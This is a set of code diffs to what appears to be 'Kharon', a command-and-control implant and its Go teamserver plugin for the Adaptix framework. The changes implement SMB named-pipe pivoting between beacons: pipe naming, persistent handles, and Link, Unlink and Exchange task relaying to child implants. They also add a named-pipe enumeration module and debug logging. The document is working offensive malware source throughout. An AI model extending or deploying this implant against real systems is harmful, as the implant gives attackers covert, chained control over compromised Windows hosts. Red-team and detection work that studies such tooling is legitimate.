+    Self->Ntdll.DbgPrint( "[SMB-CFG] PROFILE_C2 is NOT SMB (value=0x%x)\n", PROFILE_C2 );
+#endif
+
+#if PROFILE_C2 == PROFILE_HTTP
     // http proxy
     Cfg->Http.Proxy.Enabled  = HTTP_PROXY_ENABLED;
     Cfg->Http.Proxy.Url      = HTTP_PROXY_URL;
@@ -267,4 +281,5 @@ auto DECLFN GetConfig( KHARON_CONFIG* Cfg ) -> VOID {
             }
         }
     }
+#endif // PROFILE_C2 == PROFILE_HTTP
 }

--- a/agent_kharon/src_beacon/Source/Config.cc
+++ b/agent_kharon/src_beacon/Source/Config.cc
@@ -70,27 +70,15 @@ auto DECLFN GetConfig( KHARON_CONFIG* Cfg ) -> VOID {
     }
 
     // SMB pipe name as stack byte array (NOT static — .data section is stripped from PIC)
-    // Append 4-char random suffix so each beacon instance gets a unique pipe name.
-    // Without this, multiple beacons on the same host create pipes with the same name,
-    // causing Exchange to connect to the wrong beacon (Windows picks any available instance).
+    // Static pipe name from listener config — identity is via UUID, not pipe name.
+    // PIPE_UNLIMITED_INSTANCES handles multiple beacons on the same host.
     BYTE smb_pipe_bytes[] = SMB_PIPE_NAME;
     ULONG base_len = sizeof(smb_pipe_bytes) - 1; // exclude null
-    ULONG suffix_len = 5; // "_" + 4 hex chars
-    ULONG total_len = base_len + suffix_len + 1; // + null
-    Self->Tsp->Pipe.Name = (PCHAR)KhAlloc( total_len );
+    Self->Tsp->Pipe.Name = (PCHAR)KhAlloc( base_len + 1 );
     Mem::Copy( Self->Tsp->Pipe.Name, smb_pipe_bytes, base_len );
-    Self->Tsp->Pipe.Name[base_len] = '_';
-    {
-        ULONG pseed = Self->Krnl32.GetTickCount();
-        PCHAR hx = (PCHAR)"0123456789abcdef";
-        for ( ULONG si = 0; si < 4; si++ ) {
-            pseed = Self->Ntdll.RtlRandomEx( &pseed );
-            Self->Tsp->Pipe.Name[base_len + 1 + si] = hx[pseed % 16];
-        }
-    }
-    Self->Tsp->Pipe.Name[total_len - 1] = 0;
-    Self->Ntdll.DbgPrint( "[SMB-CFG] Pipe name set: %s (len=%d, bytes[0]=0x%02x)\n",
-        Self->Tsp->Pipe.Name, total_len - 1, smb_pipe_bytes[0] );
+    Self->Tsp->Pipe.Name[base_len] = 0;
+    Self->Ntdll.DbgPrint( "[SMB-CFG] Pipe name set: %s (len=%d)\n",
+        Self->Tsp->Pipe.Name, base_len );
 #else
     Self->Ntdll.DbgPrint( "[SMB-CFG] PROFILE_C2 is NOT SMB (value=0x%x)\n", PROFILE_C2 );
 #endif

--- a/agent_kharon/src_beacon/Source/Misc/Jobs.cc
+++ b/agent_kharon/src_beacon/Source/Misc/Jobs.cc
@@ -79,7 +79,9 @@ auto DECLFN Jobs::Send(
             Current->State    == KH_JOB_READY_SEND &&
             Current->ExitCode == EXIT_SUCCESS
         ) {
-            Self->Pkg->Int32( PostJobs, PROFILE_C2 );
+            Self->Ntdll.DbgPrint( "[JOBS] Send: cmdID=%d, Pkg->Length=%d, Pkg->Buffer=%p\n",
+                Current->CmdID, Current->Pkg->Length, Current->Pkg->Buffer );
+            Self->Pkg->Int32( PostJobs, Self->Tsp->Pipe.Name ? PROFILE_SMB : PROFILE_HTTP );
             Self->Pkg->Int32( PostJobs, Current->Pkg->Length );
             Self->Pkg->Pad( PostJobs, UC_PTR( Current->Pkg->Buffer ), Current->Pkg->Length );
         } else if ( 
@@ -100,7 +102,7 @@ auto DECLFN Jobs::Send(
 
             MsgLen = MsgLen ? MsgLen : Str::LengthA( Unknown );
 
-            Self->Pkg->Int32( PostJobs, PROFILE_C2 );
+            Self->Pkg->Int32( PostJobs, Self->Tsp->Pipe.Name ? PROFILE_SMB : PROFILE_HTTP );
             Self->Pkg->Int32( PostJobs, MsgLen + 2 + 40 + sizeof(INT16) + sizeof(INT32) );
 
             Self->Pkg->Bytes( PostJobs, UC_PTR( Current->UUID ), 36 );

--- a/agent_kharon/src_beacon/Source/Misc/Tasks.cc
+++ b/agent_kharon/src_beacon/Source/Misc/Tasks.cc
@@ -1923,10 +1923,12 @@ auto DECLFN Task::Exit(
     Job->State    = KH_JOB_READY_SEND;
     Job->ExitCode = EXIT_SUCCESS;
 
-    Self->Jbs->Send( Self->Jbs->PostJobs );
-    // Self->Jbs->Cleanup();
-
-    // Self->Hp->Clean();
+    // For SMB: skip manual Send — it creates a new pipe and blocks forever
+    // on ConnectNamedPipe, preventing RtlExitUserProcess from executing.
+    // The Dispatcher's FinalRoutine will handle the final Send.
+    if ( ! Self->Tsp->Pipe.Name ) {
+        Self->Jbs->Send( Self->Jbs->PostJobs );
+    }
 
     if ( ExitType == Action::Exit::Proc ) {
         Self->Ntdll.RtlExitUserProcess( EXIT_SUCCESS );

--- a/agent_kharon/src_beacon/Source/Misc/Tasks.cc
+++ b/agent_kharon/src_beacon/Source/Misc/Tasks.cc
@@ -31,7 +31,8 @@ auto DECLFN Task::Dispatcher( VOID ) -> VOID {
             }
             Self->Jbs->Send( Self->Jbs->PostJobs );
         } else if ( Self->Tsp->Pipe.Name ) {
-            // SMB: must always send PostJobs to close the pipe from Call 1
+            // SMB: must always send PostJobs (Call 2) to complete the read/write cycle
+            // and reset TasksRead flag for the next iteration
             Self->Jbs->Send( Self->Jbs->PostJobs );
         }
 
@@ -803,7 +804,7 @@ auto DECLFN Task::Pivot(
             break;
         }
         case Action::Pivot::Exchange: {
-            // Relay task data to SMB child and read response
+            // Relay task data to SMB child and read response using persistent handle
             PCHAR PivotId = Self->Psr->Str( Parser, 0 );
             ULONG DataLen = 0;
             PBYTE Data    = Self->Psr->Bytes( Parser, &DataLen );
@@ -815,76 +816,55 @@ auto DECLFN Task::Pivot(
 
             Self->Ntdll.DbgPrint( "[PIVOT] Exchange: pivotId=%s, data=%d bytes\n", PivotId, DataLen );
 
-            // Get specific child by its AgentId (server sends ChildAgentId as PivotId)
+            // Get child by AgentId — handle was stored during Link (SmbAdd)
             SMB_PROFILE_DATA* Child = (SMB_PROFILE_DATA*)Self->Tsp->SmbGet( PivotId );
-            if ( ! Child || ! Child->PipePath ) {
-                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: child not found for id=%s\n", PivotId );
+            if ( ! Child || ! Child->Handle ) {
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: child not found or handle null for id=%s\n", PivotId );
                 break;
             }
 
-            // Close old handle — child closes its pipe after each exchange and recreates it
-            if ( Child->Handle ) {
-                Self->Ntdll.NtClose( Child->Handle );
-                Child->Handle = nullptr;
-            }
-
-            // Connect to child's NEW pipe (child is waiting on ConnectNamedPipe)
-            Self->Ntdll.DbgPrint( "[PIVOT] Exchange: connecting to %s\n", Child->PipePath );
-
-            HANDLE hPipe = Self->Krnl32.CreateFileA(
-                Child->PipePath,
-                GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr
-            );
-
-            if ( hPipe == INVALID_HANDLE_VALUE || ! hPipe ) {
-                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: CreateFileA failed: %d\n", KhGetError );
-                break;
-            }
-
-            Child->Handle = hPipe;
-
-            // Write [4B len][data] as SINGLE message for PIPE_TYPE_MESSAGE
+            // Write tasks to persistent handle [4B len][data]
             ULONG TotalWriteLen = sizeof(ULONG) + DataLen;
             PBYTE WriteBuf = (PBYTE)KhAlloc( TotalWriteLen );
-            if ( ! WriteBuf ) {
-                Self->Ntdll.NtClose( hPipe );
-                Child->Handle = nullptr;
-                break;
-            }
+            if ( ! WriteBuf ) break;
             Mem::Copy( WriteBuf, &DataLen, sizeof(ULONG) );
             Mem::Copy( WriteBuf + sizeof(ULONG), Data, DataLen );
             ULONG WriteLen = 0;
-            BOOL writeOk = Self->Krnl32.WriteFile( hPipe, WriteBuf, TotalWriteLen, &WriteLen, nullptr );
+            BOOL writeOk = Self->Krnl32.WriteFile( Child->Handle, WriteBuf, TotalWriteLen, &WriteLen, nullptr );
             KhFree( WriteBuf );
             if ( ! writeOk ) {
-                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: WriteFile failed: %d\n", KhGetError );
-                Self->Ntdll.NtClose( hPipe );
-                Child->Handle = nullptr;
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: WriteFile failed: %d — removing child\n", KhGetError );
+                Self->Tsp->SmbRm( Child );
                 break;
             }
 
             Self->Ntdll.DbgPrint( "[PIVOT] Exchange: wrote %d bytes tasks to child\n", DataLen );
 
-            // Step 2: Read child's results [4B len][response]
-            // Wait for child to process and write back
+            // Read child's results from same persistent handle
+            // Wait for child to process tasks and write back
             ULONG PeekLen = 0;
-            ULONG retries = 0;
-            while ( retries < 100 ) {
-                if ( Self->Krnl32.PeekNamedPipe( hPipe, nullptr, 0, 0, &PeekLen, 0 ) && PeekLen >= 4 ) {
-                    break;
+            while ( TRUE ) {
+                if ( ! Self->Krnl32.PeekNamedPipe( Child->Handle, nullptr, 0, 0, &PeekLen, 0 ) ) {
+                    Self->Ntdll.DbgPrint( "[PIVOT] Exchange: PeekNamedPipe failed (child disconnected): %d\n", KhGetError );
+                    Self->Tsp->SmbRm( Child );
+                    goto exchange_done;
                 }
+                if ( PeekLen >= sizeof(ULONG) ) break;
                 Self->Krnl32.Sleep( 100 );
-                retries++;
             }
 
-            PBYTE RespBuf = nullptr;
-            ULONG RespLen = 0;
+            {
+                PBYTE RespBuf = nullptr;
+                ULONG RespLen = 0;
 
-            if ( PeekLen >= 4 ) {
-                // Read entire message at once (PIPE_TYPE_MESSAGE)
                 PBYTE MsgBuf = (PBYTE)KhAlloc( PeekLen );
                 ULONG ReadLen = 0;
-                Self->Krnl32.ReadFile( hPipe, MsgBuf, PeekLen, &ReadLen, nullptr );
+                if ( ! Self->Krnl32.ReadFile( Child->Handle, MsgBuf, PeekLen, &ReadLen, nullptr ) ) {
+                    Self->Ntdll.DbgPrint( "[PIVOT] Exchange: ReadFile failed: %d — removing child\n", KhGetError );
+                    KhFree( MsgBuf );
+                    Self->Tsp->SmbRm( Child );
+                    goto exchange_done;
+                }
 
                 // Extract payload: skip 4-byte length prefix
                 if ( ReadLen > sizeof(ULONG) ) {
@@ -895,24 +875,18 @@ auto DECLFN Task::Pivot(
                 KhFree( MsgBuf );
 
                 Self->Ntdll.DbgPrint( "[PIVOT] Exchange: child response = %d bytes\n", RespLen );
-            } else {
-                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: timeout waiting for child response\n" );
+
+                // Handle stays open — persistent connection
+
+                // Package child response for teamserver
+                if ( RespBuf && RespLen > 0 ) {
+                    Self->Pkg->Int32( Package, PROFILE_SMB );
+                    Self->Pkg->Bytes( Package, RespBuf, RespLen );
+                    KhFree( RespBuf );
+                }
             }
 
-            // Close pipe
-            Self->Ntdll.NtClose( hPipe );
-            Child->Handle = nullptr;
-
-            // Package child response for teamserver
-            if ( RespBuf && RespLen > 0 ) {
-                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: Package before: buf=%p len=%d\n", Package->Buffer, Package->Length );
-                Self->Pkg->Int32( Package, PROFILE_SMB );
-                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: after Int32: buf=%p len=%d\n", Package->Buffer, Package->Length );
-                Self->Pkg->Bytes( Package, RespBuf, RespLen );
-                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: after Bytes: buf=%p len=%d (resp=%d)\n", Package->Buffer, Package->Length, RespLen );
-                KhFree( RespBuf );
-            }
-
+        exchange_done:
             break;
         }
     }
@@ -1923,9 +1897,8 @@ auto DECLFN Task::Exit(
     Job->State    = KH_JOB_READY_SEND;
     Job->ExitCode = EXIT_SUCCESS;
 
-    // For SMB: skip manual Send — it creates a new pipe and blocks forever
-    // on ConnectNamedPipe, preventing RtlExitUserProcess from executing.
-    // The Dispatcher's FinalRoutine will handle the final Send.
+    // For SMB: skip manual Send — FinalRoutine handles the final Send.
+    // This avoids any timing issues during exit.
     if ( ! Self->Tsp->Pipe.Name ) {
         Self->Jbs->Send( Self->Jbs->PostJobs );
     }

--- a/agent_kharon/src_beacon/Source/Misc/Tasks.cc
+++ b/agent_kharon/src_beacon/Source/Misc/Tasks.cc
@@ -15,7 +15,23 @@ auto DECLFN Task::Dispatcher( VOID ) -> VOID {
     ULONG    TaskQtt  = 0;
 
     auto FinalRoutine = [&]( VOID ) {
-        if ( Self->Jbs->ExecuteAll() ) {
+        Self->Jbs->QuickCount = 0;
+        LONG ExecResult = Self->Jbs->ExecuteAll();
+        if ( ExecResult ) {
+            // Update taskCount in PostJobs if QuickMsg entries were added during ExecuteAll
+            if ( Self->Jbs->QuickCount > 0 && Self->Jbs->PostJobs ) {
+                UCHAR* CountPos = UC_PTR( Self->Jbs->PostJobs->Buffer ) + Self->Jbs->PostJobsCountPos;
+                ULONG  OldCount = ( (ULONG)CountPos[0] << 24 ) | ( (ULONG)CountPos[1] << 16 ) |
+                                  ( (ULONG)CountPos[2] << 8  ) |   (ULONG)CountPos[3];
+                ULONG  NewCount = OldCount + Self->Jbs->QuickCount;
+                CountPos[0] = ( NewCount >> 24 ) & 0xFF;
+                CountPos[1] = ( NewCount >> 16 ) & 0xFF;
+                CountPos[2] = ( NewCount >> 8  ) & 0xFF;
+                CountPos[3] =   NewCount         & 0xFF;
+            }
+            Self->Jbs->Send( Self->Jbs->PostJobs );
+        } else if ( Self->Tsp->Pipe.Name ) {
+            // SMB: must always send PostJobs to close the pipe from Call 1
             Self->Jbs->Send( Self->Jbs->PostJobs );
         }
 
@@ -62,6 +78,7 @@ auto DECLFN Task::Dispatcher( VOID ) -> VOID {
     Self->Pkg->Transmit( Package, &DataPsr, &PsrLen );
 
     if ( ! DataPsr || ! PsrLen ) {
+        Self->Jbs->PostJobsCountPos = Self->Jbs->PostJobs->Length;
         Self->Pkg->Int32( Self->Jbs->PostJobs, Self->Jbs->Count );
         KhDbg("Not received task");
         return FinalRoutine();
@@ -87,6 +104,7 @@ auto DECLFN Task::Dispatcher( VOID ) -> VOID {
                 return FinalRoutine();
             }
  
+            Self->Jbs->PostJobsCountPos = Self->Jbs->PostJobs->Length;
             Self->Pkg->Int32( Self->Jbs->PostJobs, TaskQtt + Self->Jbs->Count );
 
             for ( ULONG i = 0; i < TaskQtt; i++ ) {
@@ -109,6 +127,7 @@ auto DECLFN Task::Dispatcher( VOID ) -> VOID {
                 }
             }
         } else {
+            Self->Jbs->PostJobsCountPos = Self->Jbs->PostJobs->Length;
             Self->Pkg->Int32( Self->Jbs->PostJobs, Self->Jbs->Count );
         }
     }
@@ -715,17 +734,189 @@ auto DECLFN Task::Pivot(
     Self->Pkg->Byte( Package, SubCmd );    
 
     switch ( (Action::Pivot)SubCmd ) {
-        case Action::Pivot::List: {
-
-        }
         case Action::Pivot::Link: {
+            PCHAR PipePath = Self->Psr->Str( Parser, 0 );
+            if ( ! PipePath ) {
+                Self->Ntdll.DbgPrint( "[PIVOT] Link: no pipe path\n" );
+                Self->Pkg->Str( Package, (PCHAR)"link: no pipe path" );
+                KhSetError( ERROR_INVALID_PARAMETER );
+                break;
+            }
 
+            Self->Ntdll.DbgPrint( "[PIVOT] Link: connecting to %s\n", PipePath );
+
+            // Connect to the child's named pipe and read its checkin data
+            SMB_PROFILE_DATA* SmbNode = (SMB_PROFILE_DATA*)Self->Tsp->SmbAdd( PipePath, Parser, Package );
+            if ( ! SmbNode ) {
+                ULONG err = KhGetError;
+                Self->Ntdll.DbgPrint( "[PIVOT] Link: SmbAdd failed, error=%d\n", err );
+
+                // Report failure to operator via task output
+                CHAR errMsg[128] = { 0 };
+                Self->Msvcrt.k_vswprintf; // ensure msvcrt is loaded
+                // Build error string manually
+                PCHAR p = errMsg;
+                PCHAR prefix = (PCHAR)"link failed: CreateFileA error=";
+                while ( *prefix ) *p++ = *prefix++;
+                // Convert error code to decimal
+                ULONG tmp = err;
+                CHAR numBuf[12] = { 0 };
+                INT idx = 0;
+                if ( tmp == 0 ) { numBuf[idx++] = '0'; }
+                else { while ( tmp > 0 ) { numBuf[idx++] = '0' + (tmp % 10); tmp /= 10; } }
+                for ( INT i = idx - 1; i >= 0; i-- ) *p++ = numBuf[i];
+                *p = 0;
+
+                Self->Pkg->Str( Package, errMsg );
+                KhSetError( ERROR_PIPE_NOT_CONNECTED );
+                break;
+            }
+
+            Self->Ntdll.DbgPrint( "[PIVOT] Link: connected, child UUID=%s, data=%d bytes\n",
+                SmbNode->SmbUUID, SmbNode->Pkg->Length );
+
+            // Forward child's checkin blob to teamserver
+            // Format matches Adaptix COMMAND_LINK: [byte linkType][int32 watermark][bytes beat]
+            Self->Pkg->Int32( Package, (UINT32)0xc17a905a );  // Kharon agent watermark
+            Self->Pkg->Bytes( Package, (PBYTE)SmbNode->Pkg->Buffer, SmbNode->Pkg->Length );
+
+            Self->Ntdll.DbgPrint( "[PIVOT] Link: forwarded %d bytes with watermark\n", SmbNode->Pkg->Length );
+            break;
         }
         case Action::Pivot::Unlink: {
+            PCHAR ChildUUID = Self->Psr->Str( Parser, 0 );
+            if ( ! ChildUUID ) {
+                KhSetError( ERROR_INVALID_PARAMETER );
+                break;
+            }
 
+            Self->Ntdll.DbgPrint( "[PIVOT] Unlink: removing %s\n", ChildUUID );
+
+            PVOID SmbNode = Self->Tsp->SmbGet( ChildUUID );
+            if ( SmbNode ) {
+                Self->Tsp->SmbRm( SmbNode );
+                Self->Ntdll.DbgPrint( "[PIVOT] Unlink: removed\n" );
+            }
+            break;
+        }
+        case Action::Pivot::List: {
+            break;
+        }
+        case Action::Pivot::Exchange: {
+            // Relay task data to SMB child and read response
+            PCHAR PivotId = Self->Psr->Str( Parser, 0 );
+            ULONG DataLen = 0;
+            PBYTE Data    = Self->Psr->Bytes( Parser, &DataLen );
+
+            if ( ! PivotId || ! Data || DataLen == 0 ) {
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: missing pivotId or data\n" );
+                break;
+            }
+
+            Self->Ntdll.DbgPrint( "[PIVOT] Exchange: pivotId=%s, data=%d bytes\n", PivotId, DataLen );
+
+            // Get child from the SMB linked list
+            SMB_PROFILE_DATA* Child = (SMB_PROFILE_DATA*)Self->Tsp->SmbList();
+            if ( ! Child || ! Child->PipePath ) {
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: no connected child\n" );
+                break;
+            }
+
+            // Close old handle — child closes its pipe after each exchange and recreates it
+            if ( Child->Handle ) {
+                Self->Ntdll.NtClose( Child->Handle );
+                Child->Handle = nullptr;
+            }
+
+            // Connect to child's NEW pipe (child is waiting on ConnectNamedPipe)
+            Self->Ntdll.DbgPrint( "[PIVOT] Exchange: connecting to %s\n", Child->PipePath );
+
+            HANDLE hPipe = Self->Krnl32.CreateFileA(
+                Child->PipePath,
+                GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr
+            );
+
+            if ( hPipe == INVALID_HANDLE_VALUE || ! hPipe ) {
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: CreateFileA failed: %d\n", KhGetError );
+                break;
+            }
+
+            Child->Handle = hPipe;
+
+            // Write [4B len][data] as SINGLE message for PIPE_TYPE_MESSAGE
+            ULONG TotalWriteLen = sizeof(ULONG) + DataLen;
+            PBYTE WriteBuf = (PBYTE)KhAlloc( TotalWriteLen );
+            if ( ! WriteBuf ) {
+                Self->Ntdll.NtClose( hPipe );
+                Child->Handle = nullptr;
+                break;
+            }
+            Mem::Copy( WriteBuf, &DataLen, sizeof(ULONG) );
+            Mem::Copy( WriteBuf + sizeof(ULONG), Data, DataLen );
+            ULONG WriteLen = 0;
+            BOOL writeOk = Self->Krnl32.WriteFile( hPipe, WriteBuf, TotalWriteLen, &WriteLen, nullptr );
+            KhFree( WriteBuf );
+            if ( ! writeOk ) {
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: WriteFile failed: %d\n", KhGetError );
+                Self->Ntdll.NtClose( hPipe );
+                Child->Handle = nullptr;
+                break;
+            }
+
+            Self->Ntdll.DbgPrint( "[PIVOT] Exchange: wrote %d bytes tasks to child\n", DataLen );
+
+            // Step 2: Read child's results [4B len][response]
+            // Wait for child to process and write back
+            ULONG PeekLen = 0;
+            ULONG retries = 0;
+            while ( retries < 100 ) {
+                if ( Self->Krnl32.PeekNamedPipe( hPipe, nullptr, 0, 0, &PeekLen, 0 ) && PeekLen >= 4 ) {
+                    break;
+                }
+                Self->Krnl32.Sleep( 100 );
+                retries++;
+            }
+
+            PBYTE RespBuf = nullptr;
+            ULONG RespLen = 0;
+
+            if ( PeekLen >= 4 ) {
+                // Read entire message at once (PIPE_TYPE_MESSAGE)
+                PBYTE MsgBuf = (PBYTE)KhAlloc( PeekLen );
+                ULONG ReadLen = 0;
+                Self->Krnl32.ReadFile( hPipe, MsgBuf, PeekLen, &ReadLen, nullptr );
+
+                // Extract payload: skip 4-byte length prefix
+                if ( ReadLen > sizeof(ULONG) ) {
+                    RespLen = ReadLen - sizeof(ULONG);
+                    RespBuf = (PBYTE)KhAlloc( RespLen );
+                    Mem::Copy( RespBuf, MsgBuf + sizeof(ULONG), RespLen );
+                }
+                KhFree( MsgBuf );
+
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: child response = %d bytes\n", RespLen );
+            } else {
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: timeout waiting for child response\n" );
+            }
+
+            // Close pipe
+            Self->Ntdll.NtClose( hPipe );
+            Child->Handle = nullptr;
+
+            // Package child response for teamserver
+            if ( RespBuf && RespLen > 0 ) {
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: Package before: buf=%p len=%d\n", Package->Buffer, Package->Length );
+                Self->Pkg->Int32( Package, PROFILE_SMB );
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: after Int32: buf=%p len=%d\n", Package->Buffer, Package->Length );
+                Self->Pkg->Bytes( Package, RespBuf, RespLen );
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: after Bytes: buf=%p len=%d (resp=%d)\n", Package->Buffer, Package->Length, RespLen );
+                KhFree( RespBuf );
+            }
+
+            break;
         }
     }
-    
+
     return KhRetSuccess;
 }
 

--- a/agent_kharon/src_beacon/Source/Misc/Tasks.cc
+++ b/agent_kharon/src_beacon/Source/Misc/Tasks.cc
@@ -815,10 +815,10 @@ auto DECLFN Task::Pivot(
 
             Self->Ntdll.DbgPrint( "[PIVOT] Exchange: pivotId=%s, data=%d bytes\n", PivotId, DataLen );
 
-            // Get child from the SMB linked list
-            SMB_PROFILE_DATA* Child = (SMB_PROFILE_DATA*)Self->Tsp->SmbList();
+            // Get specific child by its AgentId (server sends ChildAgentId as PivotId)
+            SMB_PROFILE_DATA* Child = (SMB_PROFILE_DATA*)Self->Tsp->SmbGet( PivotId );
             if ( ! Child || ! Child->PipePath ) {
-                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: no connected child\n" );
+                Self->Ntdll.DbgPrint( "[PIVOT] Exchange: child not found for id=%s\n", PivotId );
                 break;
             }
 

--- a/agent_kharon/src_beacon/Source/Misc/Utils.cc
+++ b/agent_kharon/src_beacon/Source/Misc/Utils.cc
@@ -125,6 +125,8 @@ auto DECLFN Useful::FindGadget(
         }
     }
 
+    if ( GadgetCounter == 0 ) return 0;
+
     RndIndex = Rnd32() % GadgetCounter;
     Gadget   = GadgetList[RndIndex];
 

--- a/agent_kharon/src_core/Makefile
+++ b/agent_kharon/src_core/Makefile
@@ -14,7 +14,7 @@ FS_SRCS = file_system/cat.cc file_system/cp.cc file_system/ls.cc \
 PSX_SRCS = kit/kit_postex.cc
 INJ_SRCS  = injection/scinject.cc
 PROC_SRCS = process/create.cc process/grep.cc process/kill.cc process/list.cc
-GEN_SRCS = general/config.cc 
+GEN_SRCS = general/config.cc general/list_pipe.cc
 
 # All source files
 ALL_SRCS = $(FS_SRCS) $(HWBP_SRCS) $(INJ_SRCS) $(PROC_SRCS) $(RBOF_SRCS) $(GEN_SRCS) $(PSX_SRCS)

--- a/agent_kharon/src_core/general/list_pipe.cc
+++ b/agent_kharon/src_core/general/list_pipe.cc
@@ -1,0 +1,45 @@
+#include <general.h>
+
+// Case-insensitive wide-char substring match
+static auto wstr_icontains( WCHAR* haystack, WCHAR* needle ) -> BOOL {
+    if ( !needle || !needle[0] ) return TRUE;
+
+    for ( ULONG i = 0; haystack[i]; i++ ) {
+        BOOL match = TRUE;
+        for ( ULONG j = 0; needle[j]; j++ ) {
+            if ( !haystack[i + j] ) { match = FALSE; break; }
+            WCHAR a = haystack[i + j];
+            WCHAR b = needle[j];
+            if ( a >= L'A' && a <= L'Z' ) a += 32;
+            if ( b >= L'A' && b <= L'Z' ) b += 32;
+            if ( a != b ) { match = FALSE; break; }
+        }
+        if ( match ) return TRUE;
+    }
+    return FALSE;
+}
+
+extern "C" auto go( char* args, int argc ) -> void {
+    datap parser = { 0 };
+    BeaconDataParse( &parser, args, argc );
+    WCHAR* filter = (WCHAR*)BeaconDataExtract( &parser, nullptr );
+
+    WIN32_FIND_DATAW fd;
+    HANDLE h = FindFirstFileW( L"\\\\.\\pipe\\*", &fd );
+    if ( h == INVALID_HANDLE_VALUE ) {
+        BeaconPrintf( CALLBACK_ERROR, "Failed to enumerate pipes: %d\n", GetLastError() );
+        return;
+    }
+
+    int count = 0;
+    do {
+        if ( filter && filter[0] ) {
+            if ( !wstr_icontains( fd.cFileName, filter ) ) continue;
+        }
+        BeaconPrintfW( CALLBACK_OUTPUT, L"  \\\\.\\pipe\\%s\n", fd.cFileName );
+        count++;
+    } while ( FindNextFileW( h, &fd ) );
+
+    FindClose( h );
+    BeaconPrintf( CALLBACK_OUTPUT, "\n[+] Found %d pipe(s)\n", count );
+}

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -2028,31 +2028,38 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 	}
 
 	taskCount := packer.ParseInt32()
+	fmt.Printf("[PTR-DBG] ProcessTasksResult: agent=%s, taskCount=%d, packerSize=%d\n", agentData.Id, taskCount, packer.Size())
 
 	for taskIndex := uint(0); taskIndex < taskCount && packer.CheckPacker([]string{"int"}); taskIndex++ {
 		dataType := packer.ParseInt32()
+		fmt.Printf("[PTR-DBG]   task[%d]: dataType=0x%x, remaining=%d\n", taskIndex, dataType, packer.Size())
 
 		if dataType == uint(MSG_QUICK) || dataType == uint(MSG_OUT) {
 			if len(packer.buffer) < 16 {
+				fmt.Printf("[PTR-DBG]   MSG_QUICK: buffer too small (%d)\n", len(packer.buffer))
 				return outTasks
 			}
 
 			TaskUID := string(packer.ParsePad(36))
 			if len(TaskUID) < 8 {
+				fmt.Printf("[PTR-DBG]   MSG_QUICK: TaskUID too short\n")
 				return outTasks
 			}
 			task := taskData
 			task.TaskId = TaskUID[:8]
+			fmt.Printf("[PTR-DBG]   MSG_QUICK: TaskId=%s, remaining=%d\n", task.TaskId, packer.Size())
 
 			if dataType == 0x7 && packer.CheckPacker([]string{"int"}) {
 				packer.ParseInt32()
 			}
 
 			if false == packer.CheckPacker([]string{"int", "array"}) {
+				fmt.Printf("[PTR-DBG]   MSG_QUICK: CheckPacker(int,array) FAILED, remaining=%d\n", packer.Size())
 				return outTasks
 			}
 
 			outputType := packer.ParseInt32()
+			fmt.Printf("[PTR-DBG]   MSG_QUICK: outputType=%d\n", outputType)
 
 			switch outputType {
 			case CALLBACK_ERROR:
@@ -2135,12 +2142,16 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 			outTasks = append(outTasks, task)
 
 		} else if dataType == uint(PROFILE_WEB) || dataType == uint(PROFILE_SMB) { // web || smb
+			fmt.Printf("[PTR-DBG]   PROFILE_SMB/WEB entry, checking array...\n")
 
 			if false == packer.CheckPacker([]string{"array"}) {
+				fmt.Printf("[PTR-DBG]   CheckPacker(array) FAILED, remaining=%d\n", packer.Size())
 				return outTasks
 			}
 
-			cmd_packer := CreatePacker(packer.ParseBytes())
+			innerBytes := packer.ParseBytes()
+			fmt.Printf("[PTR-DBG]   inner bytes=%d\n", len(innerBytes))
+			cmd_packer := CreatePacker(innerBytes)
 			if cmd_packer.CheckPacker([]string{"array", "word"}) {
 
 				TaskUID := cmd_packer.ParseString()
@@ -2151,6 +2162,7 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 				task.TaskId = TaskUID[:8]
 
 				commandId := int16(cmd_packer.ParseInt16())
+				fmt.Printf("[PTR-DBG]   PROFILE_SMB: TaskUID=%s, commandId=%d\n", task.TaskId, commandId)
 					switch commandId {
 
 				case TASK_JOB:

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -2002,7 +2002,7 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 		// Read callback type (4 bytes BIG ENDIAN at offset 37)
 		remaining := packedData[37:]
 		if len(remaining) >= 4 {
-			callbackType := uint32(remaining[0])<<24 | uint32(remaining[1])<<16 | uint32(remaining[2])<<8 | uint32(remaining[3])
+			_ = uint32(remaining[0])<<24 | uint32(remaining[1])<<16 | uint32(remaining[2])<<8 | uint32(remaining[3])
 			remaining = remaining[4:]
 
 			// Read message string (length-prefixed BIG ENDIAN: [4B len][chars])

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -2862,10 +2862,9 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 									} else {
 										// Store mapping: serverAgentId → original UUID prefix from checkin blob.
 										// The beacon identifies children by SmbUUID (first 8 chars of checkin UUID),
-										// but the server assigns a random agent ID. Exchange needs the original.
+										// but CreateAgent assigns a random agent ID. Exchange needs the original.
 										if len(childData) >= 8 {
